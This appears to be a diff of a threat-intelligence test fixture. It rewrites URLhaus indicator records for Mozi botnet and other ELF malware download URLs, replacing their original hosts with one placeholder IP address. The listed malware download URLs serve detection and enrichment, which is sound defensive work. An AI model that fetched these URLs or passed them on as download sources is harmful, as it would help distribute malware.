- "full": "http://186.33.105.12:57010/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:57010/Mozi.m"
 },
- "ip": "186.33.105.12"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694189341Z",
- "original": "{\"id\":\"961099\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961099/\",\"url\":\"http://186.33.105.12:57010/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.105.12\",\"date_added\":\"2021-01-14 17:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027772100Z",
+ "original": "{\"id\":\"961099\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961099/\",\"url\":\"http://89.160.20.156:57010/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -21738,18 +21738,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://222.137.33.111:59715/Mozi.m",
+ "original": "http://89.160.20.156:59715/Mozi.m",
 "scheme": "http",
 "port": 59715,
- "domain": "222.137.33.111",
- "full": "http://222.137.33.111:59715/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:59715/Mozi.m"
 },
- "ip": "222.137.33.111"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694193269Z",
- "original": "{\"id\":\"961100\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961100/\",\"url\":\"http://222.137.33.111:59715/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.137.33.111\",\"date_added\":\"2021-01-14 17:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027779100Z",
+ "original": "{\"id\":\"961100\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961100/\",\"url\":\"http://89.160.20.156:59715/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -21787,18 +21787,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://42.231.120.221:57052/Mozi.m",
+ "original": "http://89.160.20.156:57052/Mozi.m",
 "scheme": "http",
 "port": 57052,
- "domain": "42.231.120.221",
- "full": "http://42.231.120.221:57052/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:57052/Mozi.m"
 },
- "ip": "42.231.120.221"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694196645Z",
- "original": "{\"id\":\"961094\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961094/\",\"url\":\"http://42.231.120.221:57052/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.231.120.221\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027786Z",
+ "original": "{\"id\":\"961094\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961094/\",\"url\":\"http://89.160.20.156:57052/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -21836,18 +21836,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://182.117.11.37:60550/Mozi.m",
+ "original": "http://89.160.20.156:60550/Mozi.m",
 "scheme": "http",
 "port": 60550,
- "domain": "182.117.11.37",
- "full": "http://182.117.11.37:60550/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:60550/Mozi.m"
 },
- "ip": "182.117.11.37"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694200032Z",
- "original": "{\"id\":\"961095\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961095/\",\"url\":\"http://182.117.11.37:60550/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.117.11.37\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027793Z",
+ "original": "{\"id\":\"961095\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961095/\",\"url\":\"http://89.160.20.156:60550/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -21885,18 +21885,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://186.33.104.144:39684/Mozi.m",
+ "original": "http://89.160.20.156:39684/Mozi.m",
 "scheme": "http",
 "port": 39684,
- "domain": "186.33.104.144",
- "full": "http://186.33.104.144:39684/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:39684/Mozi.m"
 },
- "ip": "186.33.104.144"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694203468Z",
- "original": "{\"id\":\"961096\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961096/\",\"url\":\"http://186.33.104.144:39684/Mozi.m\",\"url_status\":\"offline\",\"host\":\"186.33.104.144\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027800Z",
+ "original": "{\"id\":\"961096\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961096/\",\"url\":\"http://89.160.20.156:39684/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -21934,18 +21934,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://122.188.41.69:43593/Mozi.a",
+ "original": "http://89.160.20.156:43593/Mozi.a",
 "scheme": "http",
 "port": 43593,
- "domain": "122.188.41.69",
- "full": "http://122.188.41.69:43593/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:43593/Mozi.a"
 },
- "ip": "122.188.41.69"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694206844Z",
- "original": "{\"id\":\"961097\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961097/\",\"url\":\"http://122.188.41.69:43593/Mozi.a\",\"url_status\":\"online\",\"host\":\"122.188.41.69\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027807Z",
+ "original": "{\"id\":\"961097\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961097/\",\"url\":\"http://89.160.20.156:43593/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -21983,18 +21983,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://125.42.207.154:36066/Mozi.m",
+ "original": "http://89.160.20.156:36066/Mozi.m",
 "scheme": "http",
 "port": 36066,
- "domain": "125.42.207.154",
- "full": "http://125.42.207.154:36066/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:36066/Mozi.m"
 },
- "ip": "125.42.207.154"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694210080Z",
- "original": "{\"id\":\"961098\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961098/\",\"url\":\"http://125.42.207.154:36066/Mozi.m\",\"url_status\":\"offline\",\"host\":\"125.42.207.154\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027813900Z",
+ "original": "{\"id\":\"961098\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961098/\",\"url\":\"http://89.160.20.156:36066/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -22032,18 +22032,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://115.230.82.41:35006/Mozi.m",
+ "original": "http://89.160.20.156:35006/Mozi.m",
 "scheme": "http",
 "port": 35006,
- "domain": "115.230.82.41",
- "full": "http://115.230.82.41:35006/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:35006/Mozi.m"
 },
- "ip": "115.230.82.41"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694213407Z",
- "original": "{\"id\":\"961093\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961093/\",\"url\":\"http://115.230.82.41:35006/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.230.82.41\",\"date_added\":\"2021-01-14 17:19:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027820800Z",
+ "original": "{\"id\":\"961093\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961093/\",\"url\":\"http://89.160.20.156:35006/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -22081,18 +22081,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://113.90.177.157:38184/Mozi.m",
+ "original": "http://89.160.20.156:38184/Mozi.m",
 "scheme": "http",
 "port": 38184,
- "domain": "113.90.177.157",
- "full": "http://113.90.177.157:38184/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:38184/Mozi.m"
 },
- "ip": "113.90.177.157"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694216623Z",
- "original": "{\"id\":\"961091\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961091/\",\"url\":\"http://113.90.177.157:38184/Mozi.m\",\"url_status\":\"online\",\"host\":\"113.90.177.157\",\"date_added\":\"2021-01-14 17:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027827700Z",
+ "original": "{\"id\":\"961091\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961091/\",\"url\":\"http://89.160.20.156:38184/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -22130,18 +22130,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://112.228.183.24:59027/Mozi.m",
+ "original": "http://89.160.20.156:59027/Mozi.m",
 "scheme": "http",
 "port": 59027,
- "domain": "112.228.183.24",
- "full": "http://112.228.183.24:59027/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:59027/Mozi.m"
 },
- "ip": "112.228.183.24"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694219829Z",
- "original": "{\"id\":\"961092\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961092/\",\"url\":\"http://112.228.183.24:59027/Mozi.m\",\"url_status\":\"online\",\"host\":\"112.228.183.24\",\"date_added\":\"2021-01-14 17:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027834600Z",
+ "original": "{\"id\":\"961092\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961092/\",\"url\":\"http://89.160.20.156:59027/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -22179,18 +22179,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://117.192.226.105:50639/Mozi.m",
+ "original": "http://89.160.20.156:50639/Mozi.m",
 "scheme": "http",
 "port": 50639,
- "domain": "117.192.226.105",
- "full": "http://117.192.226.105:50639/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:50639/Mozi.m"
 },
- "ip": "117.192.226.105"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694223055Z",
- "original": "{\"id\":\"961090\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961090/\",\"url\":\"http://117.192.226.105:50639/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.192.226.105\",\"date_added\":\"2021-01-14 17:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027841500Z",
+ "original": "{\"id\":\"961090\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961090/\",\"url\":\"http://89.160.20.156:50639/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -22228,18 +22228,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://115.54.242.73:33534/Mozi.a",
+ "original": "http://89.160.20.156:33534/Mozi.a",
 "scheme": "http",
 "port": 33534,
- "domain": "115.54.242.73",
- "full": "http://115.54.242.73:33534/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:33534/Mozi.a"
 },
- "ip": "115.54.242.73"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694226321Z",
- "original": "{\"id\":\"961086\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961086/\",\"url\":\"http://115.54.242.73:33534/Mozi.a\",\"url_status\":\"online\",\"host\":\"115.54.242.73\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027850700Z",
+ "original": "{\"id\":\"961086\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961086/\",\"url\":\"http://89.160.20.156:33534/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -22277,18 +22277,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://115.54.208.19:36316/Mozi.m",
+ "original": "http://89.160.20.156:36316/Mozi.m",
 "scheme": "http",
 "port": 36316,
- "domain": "115.54.208.19",
- "full": "http://115.54.208.19:36316/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:36316/Mozi.m"
 },
- "ip": "115.54.208.19"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694229387Z",
- "original": "{\"id\":\"961087\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961087/\",\"url\":\"http://115.54.208.19:36316/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.54.208.19\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027857800Z",
+ "original": "{\"id\":\"961087\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961087/\",\"url\":\"http://89.160.20.156:36316/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -22326,18 +22326,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://115.97.18.154:47120/Mozi.m",
+ "original": "http://89.160.20.156:47120/Mozi.m",
 "scheme": "http",
 "port": 47120,
- "domain": "115.97.18.154",
- "full": "http://115.97.18.154:47120/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:47120/Mozi.m"
 },
- "ip": "115.97.18.154"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694232533Z",
- "original": "{\"id\":\"961088\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961088/\",\"url\":\"http://115.97.18.154:47120/Mozi.m\",\"url_status\":\"offline\",\"host\":\"115.97.18.154\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027865700Z",
+ "original": "{\"id\":\"961088\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961088/\",\"url\":\"http://89.160.20.156:47120/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -22375,18 +22375,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.213.42.231:46287/Mozi.m", + "original": "http://89.160.20.156:46287/Mozi.m", "scheme": "http", "port": 46287, - "domain": "117.213.42.231", - "full": "http://117.213.42.231:46287/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46287/Mozi.m" }, - "ip": "117.213.42.231" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694235618Z", - "original": "{\"id\":\"961089\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961089/\",\"url\":\"http://117.213.42.231:46287/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.213.42.231\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027872800Z", + "original": "{\"id\":\"961089\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961089/\",\"url\":\"http://89.160.20.156:46287/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -22425,18 +22425,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://42.236.149.218:39536/bin.sh", + "original": "http://89.160.20.156:39536/bin.sh", "scheme": "http", "port": 39536, - "domain": "42.236.149.218", - "full": "http://42.236.149.218:39536/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39536/bin.sh" }, - "ip": "42.236.149.218" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694238684Z", - "original": "{\"id\":\"961085\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961085/\",\"url\":\"http://42.236.149.218:39536/bin.sh\",\"url_status\":\"online\",\"host\":\"42.236.149.218\",\"date_added\":\"2021-01-14 17:14:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.027880Z", + "original": "{\"id\":\"961085\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961085/\",\"url\":\"http://89.160.20.156:39536/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:14:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -22474,18 +22474,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.94.181.146:40689/Mozi.m", + "original": "http://89.160.20.156:40689/Mozi.m", "scheme": "http", "port": 40689, - "domain": "59.94.181.146", - "full": "http://59.94.181.146:40689/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40689/Mozi.m" }, - "ip": "59.94.181.146" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694241910Z", - "original": "{\"id\":\"961083\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961083/\",\"url\":\"http://59.94.181.146:40689/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.94.181.146\",\"date_added\":\"2021-01-14 17:07:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027886900Z", + "original": "{\"id\":\"961083\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961083/\",\"url\":\"http://89.160.20.156:40689/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -22523,18 +22523,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://58.249.83.3:51123/Mozi.m", + "original": "http://89.160.20.156:51123/Mozi.m", "scheme": "http", "port": 51123, - "domain": "58.249.83.3", - "full": "http://58.249.83.3:51123/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51123/Mozi.m" }, - "ip": "58.249.83.3" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694245707Z", - "original": "{\"id\":\"961084\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961084/\",\"url\":\"http://58.249.83.3:51123/Mozi.m\",\"url_status\":\"online\",\"host\":\"58.249.83.3\",\"date_added\":\"2021-01-14 17:07:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027893800Z", + "original": "{\"id\":\"961084\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961084/\",\"url\":\"http://89.160.20.156:51123/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
